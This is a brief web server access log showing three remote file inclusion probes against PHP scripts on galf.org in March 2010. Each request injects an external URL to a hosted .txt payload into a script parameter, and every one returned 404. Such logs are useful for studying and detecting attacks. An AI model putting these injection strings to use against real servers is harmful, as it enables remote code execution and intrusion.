85.233.162.101 - - [01/Mar/2010:01:16:04 -0800] "GET /logs/access_090921.log%20%20//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
85.12.33.30 - - [01/Mar/2010:01:16:17 -0800] "GET //accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
85.12.33.30 - - [01/Mar/2010:01:16:17 -0800] "GET /logs/access.log%20%20///accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
